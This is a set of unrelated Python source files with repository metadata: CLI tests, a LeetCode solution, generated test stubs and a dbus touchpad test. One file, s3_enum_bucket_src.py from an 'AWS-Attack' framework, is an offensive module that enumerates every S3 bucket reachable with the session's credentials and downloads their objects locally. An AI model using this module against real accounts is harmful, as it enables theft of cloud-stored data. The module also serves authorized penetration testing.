b32b76f682558b542d37e0757152e22391f98198 | e2f5479f73bdfb9cd93a2fd7c615da369a43a499 | /tests/lastfm/commands/test_cmd_add.py | eb79cd38db6d075e48444f318b17fe6ab264ae91 | [
"MIT"
]
| permissive | tefra/pytuber | 8bdb837d0912c9bacab0bff1e0196bfdba67cb62 | a7c5d6252584dc0abee946e707f496cecaebf1bb | refs/heads/master | 2022-05-19T21:48:02.129812 | 2022-05-08T10:08:40 | 2022-05-08T10:10:24 | 161,838,438 | 10 | 6 | MIT | 2022-05-08T09:45:24 | 2018-12-14T20:44:26 | Python | UTF-8 | Python | false | false | 6,159 | py | from unittest import mock
from pytuber.cli import cli
from pytuber.core.models import PlaylistManager
from pytuber.core.models import Provider
from pytuber.lastfm.models import PlaylistType
from pytuber.lastfm.models import UserPlaylistType
from pytuber.lastfm.params import ArtistParamType
from pytuber.lastfm.params import CountryParamType
from pytuber.lastfm.params import TagParamType
from pytuber.lastfm.params import UserParamType
from tests.utils import CommandTestCase
from tests.utils import PlaylistFixture
class CommandAddTests(CommandTestCase):
@mock.patch("pytuber.lastfm.commands.cmd_add.fetch_tracks")
@mock.patch.object(UserParamType, "convert")
@mock.patch.object(PlaylistManager, "set")
def test_user_playlist(self, create_playlist, convert, fetch_tracks):
convert.return_value = "bbb"
create_playlist.return_value = PlaylistFixture.one()
result = self.runner.invoke(
cli,
["add", "lastfm", "user-playlist"],
input="\n".join(("aaa", "2", "50", "My Favorite ")),
catch_exceptions=False,
)
expected_output = (
"Last.fm username: aaa",
"Playlist Types",
"[1] User Loved Tracks",
"[2] User Top Tracks",
"[3] User Recent Tracks",
"[4] User Friends Recent Tracks",
"Select a playlist type 1-4: 2",
"Maximum tracks [50]: 50",
"Title: My Favorite ",
"Added playlist: id_a!",
)
self.assertEqual(0, result.exit_code)
self.assertOutput(expected_output, result.output)
create_playlist.assert_called_once_with(
{
"type": UserPlaylistType.USER_TOP_TRACKS,
"provider": Provider.lastfm,
"arguments": {"limit": 50, "username": "bbb"},
"title": "My Favorite",
}
)
fetch_tracks.assert_called_once_with("id_a")
@mock.patch("pytuber.lastfm.commands.cmd_add.fetch_tracks")
@mock.patch.object(PlaylistManager, "set")
def test_chart_playlist(self, create_playlist, fetch_tracks):
create_playlist.return_value = PlaylistFixture.one()
result = self.runner.invoke(
cli, ["add", "lastfm", "chart-playlist"], input="50\n "
)
expected_output = (
"Maximum tracks [50]: 50",
"Title: ",
"Added playlist: id_a!",
)
self.assertEqual(0, result.exit_code)
self.assertOutput(expected_output, result.output)
create_playlist.assert_called_once_with(
{
"type": PlaylistType.CHART,
"provider": Provider.lastfm,
"arguments": {"limit": 50},
"title": "",
}
)
fetch_tracks.assert_called_once_with("id_a")
@mock.patch("pytuber.lastfm.commands.cmd_add.fetch_tracks")
@mock.patch.object(CountryParamType, "convert")
@mock.patch.object(PlaylistManager, "set")
def test_country_playlist(self, create_playlist, country_param_type, fetch_tracks):
country_param_type.return_value = "greece"
create_playlist.return_value = PlaylistFixture.one()
result = self.runner.invoke(
cli, ["add", "lastfm", "country-playlist"], input=b"gr\n50\n "
)
expected_output = (
"Country Code: gr",
"Maximum tracks [50]: 50",
"Title: ",
"Added playlist: id_a!",
)
self.assertEqual(0, result.exit_code)
self.assertOutput(expected_output, result.output)
create_playlist.assert_called_once_with(
{
"type": PlaylistType.COUNTRY,
"provider": Provider.lastfm,
"arguments": {"limit": 50, "country": "greece"},
"title": "",
}
)
fetch_tracks.assert_called_once_with("id_a")
@mock.patch("pytuber.lastfm.commands.cmd_add.fetch_tracks")
@mock.patch.object(TagParamType, "convert")
@mock.patch.object(PlaylistManager, "set")
def test_tag_playlist(self, create_playlist, convert, fetch_tracks):
convert.return_value = "rock"
create_playlist.return_value = PlaylistFixture.one(synced=111)
result = self.runner.invoke(
cli, ["add", "lastfm", "tag-playlist"], input="rock\n50\n "
)
expected_output = (
"Tag: rock",
"Maximum tracks [50]: 50",
"Title: ",
"Updated playlist: id_a!",
)
self.assertEqual(0, result.exit_code)
self.assertOutput(expected_output, result.output)
create_playlist.assert_called_once_with(
{
"type": PlaylistType.TAG,
"provider": Provider.lastfm,
"arguments": {"limit": 50, "tag": "rock"},
"title": "",
}
)
fetch_tracks.assert_called_once_with("id_a")
@mock.patch("pytuber.lastfm.commands.cmd_add.fetch_tracks")
@mock.patch.object(ArtistParamType, "convert")
@mock.patch.object(PlaylistManager, "set")
def test_artist_playlist(self, create_playlist, artist_param, fetch_tracks):
artist_param.return_value = "Queen"
create_playlist.return_value = PlaylistFixture.one()
result = self.runner.invoke(
cli,
["add", "lastfm", "artist-playlist"],
input="Queen\n50\nQueen....",
catch_exceptions=False,
)
expected_output = (
"Artist: Queen",
"Maximum tracks [50]: 50",
"Title: Queen....",
"Added playlist: id_a!",
)
self.assertEqual(0, result.exit_code)
self.assertOutput(expected_output, result.output)
create_playlist.assert_called_once_with(
{
"type": PlaylistType.ARTIST,
"provider": Provider.lastfm,
"arguments": {"limit": 50, "artist": "Queen"},
"title": "Queen....",
}
)
fetch_tracks.assert_called_once_with("id_a")
| [
"[email protected]"
]
| |
5df5e0dd5c4926e279b6ba9b730b3394612747dc | 3cdb4faf34d8375d6aee08bcc523adadcb0c46e2 | /web/env/lib/python3.6/site-packages/user_agents/__init__.py | b8dc2453a93f1e47e2146c07f97dc0191a628b39 | [
"MIT",
"GPL-3.0-only"
]
| permissive | rizwansoaib/face-attendence | bc185d4de627ce5adab1cda7da466cb7a5fddcbe | 59300441b52d32f3ecb5095085ef9d448aef63af | refs/heads/master | 2020-04-25T23:47:47.303642 | 2019-09-12T14:26:17 | 2019-09-12T14:26:17 | 173,157,284 | 45 | 12 | MIT | 2020-02-11T23:47:55 | 2019-02-28T17:33:14 | Python | UTF-8 | Python | false | false | 48 | py | VERSION = (2, 0, 0)
from .parsers import parse
| [
"[email protected]"
]
| |
3c03f32e5eb27a8eed60265897afc1267e87e8c7 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/133/usersdata/219/41408/submittedfiles/al15.py | a09e1d37170fb844e616c106b8bacdfa9a11aef3 | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | # -*- coding: utf-8 -*-
i=1
for i in range(1000,9999,1):
a1=i%100
    a2=i//100
if((a1+a2)*(a1+a2)==i):
        print('%d\n' % i)
| [
"[email protected]"
]
| |
7818dfe58848eb01336f7b5651924a5ed6c63634 | de01cb554c2292b0fbb79b4d5413a2f6414ea472 | /algorithms/Medium/375.guess-number-higher-or-lower-ii.py | b6799751f60aa606ef7ea7280f4aafd950549035 | []
| no_license | h4hany/yeet-the-leet | 98292017eadd3dde98a079aafcd7648aa98701b4 | 563d779467ef5a7cc85cbe954eeaf3c1f5463313 | refs/heads/master | 2022-12-10T08:35:39.830260 | 2020-09-02T23:12:15 | 2020-09-02T23:12:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,154 | py | #
# @lc app=leetcode id=375 lang=python3
#
# [375] Guess Number Higher or Lower II
#
# https://leetcode.com/problems/guess-number-higher-or-lower-ii/description/
#
# algorithms
# Medium (40.27%)
# Total Accepted: 64.6K
# Total Submissions: 160.4K
# Testcase Example: '1'
#
# We are playing the Guess Game. The game is as follows:
#
# I pick a number from 1 to n. You have to guess which number I picked.
#
# Every time you guess wrong, I'll tell you whether the number I picked is
# higher or lower.
#
# However, when you guess a particular number x, and you guess wrong, you pay
# $x. You win the game when you guess the number I picked.
#
# Example:
#
#
# n = 10, I pick 8.
#
# First round: You guess 5, I tell you that it's higher. You pay $5.
# Second round: You guess 7, I tell you that it's higher. You pay $7.
# Third round: You guess 9, I tell you that it's lower. You pay $9.
#
# Game over. 8 is the number I picked.
#
# You end up paying $5 + $7 + $9 = $21.
#
#
# Given a particular n ≥ 1, find out how much money you need to have to
# guarantee a win.
#
class Solution:
def getMoneyAmount(self, n: int) -> int:
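        # One possible implementation (standard bottom-up interval DP):
        # dp[lo][hi] is the amount needed to guarantee a win when the picked
        # number is known to lie in [lo, hi].
        dp = [[0] * (n + 1) for _ in range(n + 1)]
        for hi in range(2, n + 1):
            for lo in range(hi - 1, 0, -1):
                # Choose the guess that minimizes the worst-case total cost.
                dp[lo][hi] = min(
                    pivot + max(dp[lo][pivot - 1], dp[pivot + 1][hi])
                    for pivot in range(lo, hi)
                )
        return dp[1][n]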
| [
"[email protected]"
]
| |
510028271dd0273b95172ae8801f8c4076dd5a48 | 700c7801958dd4789caf94785b5dc8c5e3daa4fd | /ttp/src/s3_enum_bucket_src.py | 8b1c813243ec768cb7a2e4575bac6e14f2e45359 | [
"Apache-2.0",
"BSD-3-Clause"
]
| permissive | blackbotsecurity/AWS-Attack | 24d4cd6ebda067e9672f4f963d414a7b176e3551 | ad4668ab60173aabce3c6b9c7685160be5e3f14d | refs/heads/master | 2023-03-14T00:05:54.965341 | 2021-03-05T12:44:27 | 2021-03-05T12:44:27 | 331,603,794 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,507 | py | #!/usr/bin/env python3
import datetime
import argparse
import datetime
from copy import deepcopy
import os
from botocore.exceptions import ClientError
FILE_SIZE_THRESHOLD = 1073741824
def get_bucket_size(awsattack, bucket_name):
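    # Estimates the bucket size from the CloudWatch 'BucketSizeBytes' metric
    # (StandardStorage) averaged over the last day; returns 0 if no datapoints exist.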
client = awsattack.get_boto3_client('cloudwatch', 'us-east-1')
response = client.get_metric_statistics(
Namespace='AWS/S3',
MetricName='BucketSizeBytes',
Dimensions=[
{'Name': 'BucketName', 'Value': bucket_name},
{'Name': 'StorageType', 'Value': 'StandardStorage'}
],
Statistics=['Average'],
Period=3600,
StartTime=datetime.datetime.today() - datetime.timedelta(days=1),
EndTime=datetime.datetime.now().isoformat()
)
if response['Datapoints']:
return response['Datapoints'][0]['Average']
return 0
def download_s3_file(awsattack, key, bucket):
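    # Downloads a single object into the session's downloads directory, prompting
    # for confirmation first when the object is larger than FILE_SIZE_THRESHOLD.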
session = awsattack.get_active_session()
base_directory = 'sessions/{}/downloads/{}/{}/'.format(session.name, technique_info['name'], bucket)
directory = base_directory
offset_directory = key.split('/')[:-1]
if offset_directory:
directory += '/' + ''.join(offset_directory)
if not os.path.exists(directory):
os.makedirs(directory)
s3 = awsattack.get_boto3_resource('s3')
size = s3.Object(bucket, key).content_length
if size > FILE_SIZE_THRESHOLD:
awsattack.print(' LARGE FILE DETECTED:')
confirm = awsattack.input(' Download {}? Size: {} bytes (y/n) '.format(key, size))
if confirm != 'y':
return False
try:
s3.Bucket(bucket).download_file(key, base_directory + key)
except Exception as error:
awsattack.print(' {}'.format(error))
return False
return True
def extract_from_file(awsattack, file):
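    # Parses a previously written names file where each line has the form
    # '<key>@<bucket>' and returns a {key: bucket} mapping.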
files = {}
try:
with open(file, 'r') as bucket_file:
for line in bucket_file:
delimiter = line.rfind('@')
key = line[:delimiter]
bucket = line[delimiter + 1:-1]
files[key] = bucket
except FileNotFoundError:
awsattack.print(' Download File not found...')
return files
def write_bucket_keys_to_file(awsattack, objects):
awsattack.print(' Writing file names to disk...')
session = awsattack.get_active_session()
file = 'sessions/{}/downloads/{}/'.format(session.name, 's3_download_bucket')
if not os.path.exists(file):
os.makedirs(file)
file += '{}_file_names.txt'.format('s3_download_bucket')
try:
with open(file, 'w') as objects_file:
for key in objects:
for file in objects[key]:
objects_file.write('{}@{}\n'.format(file, key))
except Exception as error:
print(error)
return True
def main(args, awsattack_main, data=None):
technique_info = data
session = awsattack_main.get_active_session()
print = awsattack_main.print
input = awsattack_main.input
if (args.names_only is True and args.dl_names is True):
print('Only zero or one options of --names-only, and --dl-names may be specified. Exiting...')
return {}
# Download Objects from File
if args.dl_names:
awsattack_main.print(' Extracting files from file...')
extracted_files = extract_from_file(awsattack_main, args.dl_names)
total = len(extracted_files.keys())
success = 0
for key in extracted_files:
if download_s3_file(awsattack_main, key, extracted_files[key]):
success += 1
awsattack_main.print(' Finished downloading from file...')
return {'downloaded_files': success, 'failed': total - success}
# Enumerate Buckets
client = awsattack_main.get_boto3_client('s3')
buckets = []
print('Enumerating buckets...')
try:
response = client.list_buckets()
except ClientError as error:
code = error.response['Error']['Code']
if code == 'AccessDenied':
print(' FAILURE: MISSING AWS PERMISSIONS')
else:
print(code)
return {}
s3_data = deepcopy(session.S3)
s3_data['Buckets'] = deepcopy(response['Buckets'])
session.update(awsattack_main.database, S3=s3_data)
summary_data = {'buckets': len(response['Buckets'])}
for bucket in response['Buckets']:
buckets.append(bucket['Name'])
print(' Found bucket "{bucket_name}"'.format(bucket_name=bucket['Name']))
# Process Enumerated Buckets
print('Starting enumerating objects in buckets...')
summary_data['readable_buckets'] = 0
objects = {}
for bucket in buckets:
paginator = client.get_paginator('list_objects_v2')
page_iterator = paginator.paginate(Bucket=bucket)
objects[bucket] = []
try:
for page in page_iterator:
if 'Contents' in page:
keys = [key['Key'] for key in page['Contents']]
objects[bucket].extend(keys)
summary_data['readable_buckets'] += 1
except ClientError as error:
print(' Unable to read bucket')
code = error.response['Error']['Code']
print(code)
continue
continue
# Enumerated buckets and associated list of files
print('Finished enumerating objects in buckets...')
summary_data['objects'] = objects
write_bucket_keys_to_file(awsattack_main, objects)
return summary_data
| [
"[email protected]"
]
| |
17f8fab62badcdbbb88d5cfd0c6c4506f86e6b50 | fa7c302f7df6b1773b27de3b742d551bd54aa4e2 | /test/test_input_device_all_of.py | 611ab21c2acb46f2c420d439e774eb725eb3aeaa | []
| no_license | cons3rt/cons3rt-python-sdk | d01b3b174c295491130fba0d76d046b16492e9f7 | f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0 | refs/heads/master | 2021-11-04T02:31:54.485541 | 2021-10-26T19:28:57 | 2021-10-26T19:28:57 | 241,673,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 879 | py | # coding: utf-8
"""
CONS3RT Web API
A CONS3RT ReSTful API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import cons3rt
from cons3rt.models.input_device_all_of import InputDeviceAllOf # noqa: E501
from cons3rt.rest import ApiException
class TestInputDeviceAllOf(unittest.TestCase):
"""InputDeviceAllOf unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInputDeviceAllOf(self):
"""Test InputDeviceAllOf"""
# FIXME: construct object with mandatory attributes with example values
# model = cons3rt.models.input_device_all_of.InputDeviceAllOf() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
f9c6490f5ece41b650d48ea79d24c13544978d7d | f68732bc40a7a90c3a1082e4b3a4154518acafbb | /script/dbus/sessionBus/inputDeviceTouchPad/011_palmMinWidth.py | 2aa00b420156397e97ca272516be555d2391a05b | []
| no_license | lizhouquan1017/dbus_demo | 94238a2307e44dabde9f4a4dd0cf8ec217260867 | af8442845e722b258a095e9a1afec9dddfb175bf | refs/heads/master | 2023-02-11T19:46:27.884936 | 2021-01-08T05:27:18 | 2021-01-08T05:27:18 | 327,162,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 902 | py | # -*- coding: utf-8 -*-
# ***************************************************
# @Test Case ID: 011_palmMinWidth
# @Test Description: int32 PalmMinWidth (readwrite) minimum palm-rejection width
# @Test Condition: 1. None
# @Test Step: 1. Call the interface to read the PalmMinWidth property value
# @Test Result: 1. Data of type int32 is returned
# @Test Remark:
# @Author: ut001627
# ***************************************************
import time
import pytest
from frame.base import OSBase
from aw.dbus.sessionBus import inputDeviceTouchPad
class TestCase(OSBase):
def setUp(self):
        self.Step("Precondition 1: none")
@pytest.mark.public
def test_step(self):
        self.Step("Step 1: call the interface to read the PalmMinWidth property value")
inputDeviceTouchPad.palmMinWidth()
def tearDown(self):
        self.Step("Teardown: none")
time.sleep(2)
| [
"[email protected]"
]
|